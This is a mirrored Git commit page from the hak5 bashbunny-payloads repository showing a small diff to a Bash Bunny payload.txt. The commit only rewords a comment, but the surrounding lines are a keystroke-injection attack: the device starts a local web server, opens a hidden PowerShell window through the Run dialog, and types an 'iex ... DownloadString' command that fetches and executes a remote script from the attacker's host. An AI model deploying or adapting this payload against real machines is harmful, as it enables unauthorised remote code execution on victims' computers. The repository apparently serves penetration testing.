mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Update payload.txt
This commit is contained in:
parent
fd56992d11
commit
71651b3f7b
@ -25,7 +25,7 @@ python -m SimpleHTTPServer 80 &
|
||||
# wait until port is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
# attack commences
|
||||
#Opens hidden powershell instance
|
||||
Q DELAY 1500
|
||||
Q GUI r
|
||||
Q DELAY 500
|
||||
@ -41,4 +41,4 @@ Q DELAY 250
|
||||
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
|
||||
Q DELAY 200
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
LED FINISH
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user